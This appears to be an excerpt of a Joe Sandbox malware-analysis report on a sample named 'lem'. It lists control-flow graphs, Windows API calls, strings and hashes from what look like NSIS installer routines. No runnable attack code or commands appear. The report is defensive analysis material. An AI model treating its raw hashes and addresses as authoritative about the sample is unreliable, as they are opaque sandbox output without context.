                                                                                                                                                                                                                                                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                    • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                    Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 587 406831-40683c 588 40683e-40684d 587->588 589 40684f-406863 587->589 588->589 590 406865-406872 589->590 591 40687b-406881 589->591 590->591 592 406874-406877 590->592 593 406887-406888 591->593 594 406aad-406ab6 591->594 592->591 597 406889-406896 593->597 595 406ac1-406ac2 594->595 596 406ab8-406abc call 406035 594->596 596->595 599 406aab-406aac 597->599 600 40689c-4068ac 597->600 599->594 601 4068b2-4068b5 600->601 602 406a86 600->602 603 406a89 601->603 604 4068bb-4068f9 601->604 602->603 605 406a99-406a9c 603->605 606 406a8b-406a97 603->606 607 406a19-406a22 604->607 608 4068ff-40690a GetVersion 604->608 611 406a9f-406aa5 605->611 606->611 609 406a24-406a27 607->609 610 406a5b-406a64 607->610 612 406928 608->612 613 40690c-406914 608->613 617 406a37-406a46 call 406035 609->617 618 406a29-406a35 call 405f7d 609->618 615 406a72-406a84 lstrlenW 610->615 616 406a66-406a6d call 406831 610->616 611->597 611->599 614 40692f-406936 612->614 613->612 619 406916-40691a 613->619 621 406938-40693a 614->621 622 40693b-40693d 614->622 615->611 616->615 626 406a4b-406a51 617->626 618->626 619->612 625 40691c-406920 619->625 621->622 627 406979-40697c 622->627 628 40693f-406965 call 405eff 622->628 625->612 630 406922-406926 625->630 626->615 631 406a53-406a59 call 406064 626->631 633 40698c-40698f 627->633 634 40697e-40698a GetSystemDirectoryW 627->634 641 406a05-406a09 628->641 642 40696b-406974 call 406831 628->642 630->614 631->615 638 406991-40699f GetWindowsDirectoryW 633->638 639 4069fb-4069fd 633->639 637 4069ff-406a03 634->637 637->631 637->641 638->639 639->637 643 4069a1-4069ab 639->643 641->631 645 406a0b-406a17 lstrcatW 641->645 642->637 646 4069c5-4069db SHGetSpecialFolderLocation 643->646 647 4069ad-4069b0 643->647 645->631 649 4069f6-4069f8 646->649 650 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 646->650 647->646 648 4069b2-4069b9 647->648 652 4069c1-4069c3 648->652 649->639 650->637 650->649 652->637 652->646
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                    • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                    Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 856 406301-406315 FindFirstFileW 857 406322 856->857 858 406317-406320 FindClose 856->858 859 406324-406325 857->859 858->859
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                    Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
